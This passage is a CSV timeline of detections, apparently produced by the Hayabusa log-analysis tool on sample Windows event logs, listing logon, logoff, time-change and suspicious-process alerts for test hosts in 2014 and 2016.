0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12048 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12070 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: 
IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x131c3 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x13216 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:41:21.932 
+09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36aed : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36b1d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:59:00.431 
+09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 
+09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c02 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c32 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:46.785 
+09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x170f5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x17125 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other 
File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ac86 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 
08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b245 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a23a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 
00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a265 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e056 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e3c9 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target 
Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6831f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6832b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1dc1e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ee41 : (Warning: Credentials are stored in 